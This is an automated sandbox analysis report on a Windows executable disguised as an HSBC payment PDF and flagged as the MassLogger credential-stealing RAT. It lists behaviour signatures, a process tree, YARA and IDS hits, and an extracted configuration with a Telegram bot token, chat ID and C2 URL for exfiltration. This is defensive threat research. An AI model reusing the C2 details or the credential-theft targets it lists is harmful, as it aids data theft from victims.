
Windows Analysis Report
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Sample name: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Analysis ID: 1572492
MD5: 999146408efd1a704966ca4c1c8ce4b7
SHA1: 0dc0a9373154d562c47c04d27977f483d385ea1b
SHA256: a36f4ee96ff62eee2a503838850d7dce90aabc36a704b742b6814f187618f3c1
Tags: exe, user-lowmal3

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to log keystrokes (.Net Source)
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking volume information)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe (PID: 3232 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 999146408EFD1A704966CA4C1C8CE4B7)
    • RegSvcs.exe (PID: 2724 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 6336 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 423F1F6668442F29DF26625C3F1F2479)
  • alg.exe (PID: 1412 cmdline: C:\Windows\System32\alg.exe MD5: 463F7F1E3383EFC2DF1C247DF13BE675)
  • FXSSVC.exe (PID: 7492 cmdline: C:\Windows\system32\fxssvc.exe MD5: 5DA3CAFF7B6DB6ED124E5F9690E7B126)
  • elevation_service.exe (PID: 7572 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 0B79C87888F1F817B9EF1809AC8DC7F0)
  • maintenanceservice.exe (PID: 7616 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 680DFBE855D22EE0570837F07CDC45D4)
  • msdtc.exe (PID: 7648 cmdline: C:\Windows\System32\msdtc.exe MD5: 51874DD725C538D547DFE65FED3A93E2)
  • PerceptionSimulationService.exe (PID: 7756 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 55154595EBC76876D16839386F302C81)
  • perfhost.exe (PID: 7832 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 436D2153822038C49A041E9D657F7E2D)
  • Locator.exe (PID: 7888 cmdline: C:\Windows\system32\locator.exe MD5: E30FA2BCFDF4D20217D89B9395BE104F)
  • SensorDataService.exe (PID: 7952 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 138460F80D6D680988322149C0DA8337)
  • snmptrap.exe (PID: 8012 cmdline: C:\Windows\System32\snmptrap.exe MD5: 772AEFCF949CAADFB515863053AC8C10)
  • Spectrum.exe (PID: 8080 cmdline: C:\Windows\system32\spectrum.exe MD5: A5C5CBD638C50F62E6B1C909D40EA394)
  • ssh-agent.exe (PID: 4540 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 56CCD164B03367A0F39A8360E82CB3D1)
  • TieringEngineService.exe (PID: 1416 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 978A54C9D759FF632658D6B5D6F278B3)
  • AgentService.exe (PID: 7524 cmdline: C:\Windows\system32\AgentService.exe MD5: 7CFA6C3EAA73B924E9F391CE7ED6CFFF)
  • vds.exe (PID: 1660 cmdline: C:\Windows\System32\vds.exe MD5: 9B69326495A6A2E148AF298DBBFA354E)
  • wbengine.exe (PID: 7644 cmdline: "C:\Windows\system32\wbengine.exe" MD5: A4B1E47A80405B400B4460F9F65BA8E2)
  • cleanup

Malware Configuration

{"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
Source | Rule | Description | Author
00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xf173:$a1: get_encryptedPassword
  • 0xf49b:$a2: get_encryptedUsername
  • 0xef0e:$a3: get_timePasswordChanged
  • 0xf02f:$a4: get_passwordField
  • 0xf189:$a5: set_encryptedPassword
  • 0x10ae5:$a7: get_logins
  • 0x10796:$a8: GetOutlookPasswords
  • 0x10588:$a9: StartKeylogger
  • 0x10a35:$a10: KeyLoggerEventArgs
  • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
  • 0x14729:$a5: \Kometa\User Data\Default\Login Data
(list truncated)
Source | Rule | Description | Author
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xf173:$a1: get_encryptedPassword
  • 0xf49b:$a2: get_encryptedUsername
  • 0xef0e:$a3: get_timePasswordChanged
  • 0xf02f:$a4: get_passwordField
  • 0xf189:$a5: set_encryptedPassword
  • 0x10ae5:$a7: get_logins
  • 0x10796:$a8: GetOutlookPasswords
  • 0x10588:$a9: StartKeylogger
  • 0x10a35:$a10: KeyLoggerEventArgs
  • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
5.2.RegSvcs.exe.400000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
  • 0x14729:$a5: \Kometa\User Data\Default\Login Data
(list truncated)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T16:24:28.998498+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.7 | 63892 | 1.1.1.1 | 53 | UDP
2024-12-10T16:24:22.340004+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.7 | 64298 | 1.1.1.1 | 53 | UDP
2024-12-10T16:24:14.594215+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.7 | 49702 | TCP
2024-12-10T16:24:17.429865+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49709 | TCP
2024-12-10T16:24:22.325560+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.7 | 49727 | TCP
2024-12-10T16:26:07.491789+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 49966 | TCP
2024-12-10T16:26:10.308197+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.7 | 49972 | TCP
2024-12-10T16:24:14.594215+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.7 | 49702 | TCP
2024-12-10T16:24:17.429865+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49709 | TCP
2024-12-10T16:24:22.325560+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.7 | 49727 | TCP
2024-12-10T16:26:07.491789+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 49966 | TCP
2024-12-10T16:26:10.308197+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.7 | 49972 | TCP
2024-12-10T16:24:26.952913+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49736 | 149.154.167.220 | 443 | TCP
2024-12-10T16:24:16.280523+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49708 | 193.122.6.168 | 80 | TCP
2024-12-10T16:24:24.389865+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49708 | 193.122.6.168 | 80 | TCP
2024-12-10T16:24:19.430559+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49716 | 54.244.188.177 | 80 | TCP
2024-12-10T16:25:41.188310+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49872 | 82.112.184.197 | 80 | TCP


              AV Detection

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Avira: detected
Source: http://ww99.przvgke.biz/K | Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686 | Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/opymuwnb | Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRm | Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/ | Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
Source: RegSvcs.exe.2724.5.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Joe Sandbox ML: detected

              Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49715 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312938919.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000004.00000003.1730926356.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000004.00000003.1396239663.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: armsvc.exe, 00000004.00000003.1442209675.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.4.dr
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000004.00000003.1747463030.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdb source: vds.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.4.dr
              Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000004.00000003.1621983603.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000004.00000003.1979488367.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2001927405.0000000000700000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1983124176.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000004.00000003.1652725988.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000004.00000003.1613322674.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000004.00000003.2045470839.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.2048639803.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000004.00000003.1417715785.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1904523018.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000004.00000003.2033255975.0000000000930000.00000004.00001000.00020000.00000000.sdmp
